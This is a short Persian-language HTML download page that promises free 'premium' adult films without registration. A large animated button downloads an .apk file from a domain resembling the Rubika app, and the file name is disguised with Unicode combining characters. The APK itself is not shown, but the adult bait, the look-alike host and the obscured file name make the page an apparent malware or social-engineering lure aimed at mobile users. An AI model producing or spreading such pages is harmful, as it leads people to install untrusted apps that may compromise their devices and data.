<!DOCTYPE html>
<html>
  <head>
    <title>صفحه دانلود به صورت گرافیکی</title>
    <meta charset="UTF-8">
<style>
      h1 {
  font-size: 80px; 
  color: #340f51; 
  position: relative; 
  top: -400px; 

      }
   img {
  margin-top: -350px; 
}

      p {
        color: 340f51; 
        font-size: 60px; 
      }
      html,
      body {
        height: 100%;
        margin: 0;
        padding: 0;
      }
      body {
        background: linear-gradient(to bottom right, #4a69bd, #845ec2, #d65db1);
        font-family: Arial, sans-serif;
        text-align: center;
        color: #fff;
        font-size: 24px; 
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column; 
      }
      .download-button {
        background: #6d5dfc;
        color: black; 
        padding: 20px 25px; 
        text-align: center; 
        text-decoration: none; 
        font-size: 66px;
        margin: 10px;
        cursor: pointer;
        border-radius: 10px; 
        display: inline-block;
        transition: background-color 0.3s ease; 
        animation: glowing 2s infinite; 
      }
      .rounded-image {
        border-radius: 50%;
      }
      @keyframes glowing {
        0% { background-color: #fffff; box-shadow: 0 0 5px #6d5dfc; }
        50% { background-color: #845ec2; box-shadow: 0 0 20px #845ec2; }
        100% { background-color: #6d5dfc; box-shadow: 0 0 5px #6d5dfc; }
      }
</style>
  </head>
  <body>
    <h1>Film Sexy Permiun</h1>
    <img src="https://uploadkon.ir/uploads/b89002_24۲۰۲۴۰۱۰۲-۲۰۵۱۳۱.png" alt="فیلم های رایگان)بدون ثبت‌نام(" class="rounded-image" width="500" height="500">
    <p>برای دانلود فایل، روی دکمه زیر کلیک کنید</p>
    <a href="https://rubikapp.zlc.ir/X%CD%9F%CD%9E%E2%80%8CV%CD%9F%CD%9E%E2%80%8CI%CD%9F%CD%9ED%CD%9F%CD%9EE%CD%9F%CD%9EO%CD%9F%CD%9E%E2%80%8C.apk" download>
      <button class="download-button">دانلود فایل</button>
    </a>
  </body>
</html>